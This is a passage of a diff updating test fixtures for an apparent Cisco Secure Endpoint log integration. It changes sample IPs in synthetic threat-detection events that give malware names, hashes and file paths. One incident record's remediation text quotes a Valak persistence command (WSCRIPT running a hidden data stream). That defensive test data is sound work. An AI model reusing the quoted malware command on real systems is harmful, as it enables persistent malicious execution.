+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} \ No newline at end of file diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json index 5e7cd1ad897..cd5c1bd78da 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json @@ -10,7 +10,7 @@ "Demo_Threat_Hunting" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -51,8 +51,8 @@ "event": { "severity": 4, "action": "SecureX Threat Hunting Incident", - "ingested": "2021-09-30T00:14:16.070123141Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch 